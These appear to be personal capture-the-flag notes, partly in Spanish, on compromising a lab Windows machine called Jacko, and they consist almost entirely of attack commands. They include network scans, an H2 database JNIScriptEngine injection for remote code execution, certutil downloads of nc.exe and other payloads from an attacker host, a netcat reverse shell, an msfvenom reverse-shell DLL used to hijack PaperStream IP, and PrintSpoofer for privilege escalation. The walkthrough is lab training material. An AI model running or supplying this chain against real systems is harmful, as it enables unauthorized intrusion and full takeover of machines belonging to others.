nmap -A -p- -oA jacko 192.168.199.66 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA jacko 192.168.199.66

nmap -sU -O -p- -oA jacko-udp 192.168.199.66

nikto -h 192.168.199.66:80

Pasted image 20210916135752.png

Pasted image 20210916140125.png

http://192.168.199.66

Pasted image 20210916140251.png

http://192.168.199.66:8082

Pasted image 20210916140347.png

searchsploit H2

searchsploit -m 49384.txt

Pasted image 20210916141144.png

"JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\Z").next()');

Pasted image 20210916141629.png

Pasted image 20210916141650.png

"JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f -split http://192.168.49.199/nc.exe C:/Users/tony/nc.exe").getInputStream()).useDelimiter("\Z").next()');

"JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec(" C:/Users/tony/nc.exe 192.168.49.199 445 -e cmd.exe").getInputStream()).useDelimiter("\Z").next()');

Pasted image 20210916150016.png

type local.txt

Pasted image 20210916150134.png

set PATH=%SystemRoot%\system32;%SystemRoot%;

Pasted image 20210916150725.png

Vamos a Program Files (x86) y vemos PaperStream IP

Pasted image 20210916150956.png

https://www.exploit-db.com/exploits/49832

msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.199 LPORT=135

searchsploit paperstream

searchsploit -m 49382.ps1

Pasted image 20210916165918.png

dir "\powershell.exe" \s

Pasted image 20210916151940.png

Vemos donde esta el powershell y lo corremos

Pasted image 20210916152609.png

type "C:\Program files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"

Pasted image 20210916154209.png

certutil -urlcache -f -split http://192.168.49.199/PrintSpoofer.exe C:/Users/tony/print.exe

Pasted image 20210916160834.png

https://github.com/dievus/printspoofer

python3 -m http.server 80

Pasted image 20210916160850.png

"JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f -split http://192.168.49.199/UninOldIS.dll C:/Users/tony/UninOldIS.dll ").getInputStream()).useDelimiter("\Z").next()');

"JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f -split http://192.168.49.199/49382.ps1 C:/Users/tony/49382.ps1 ").getInputStream()).useDelimiter("\Z").next()');

Pasted image 20210916164248.png

nc -lvnp 135

Pasted image 20210916165454.png

Pasted image 20210916165659.png

boxes

copyright©2022 Cu3rv0x all rights reserved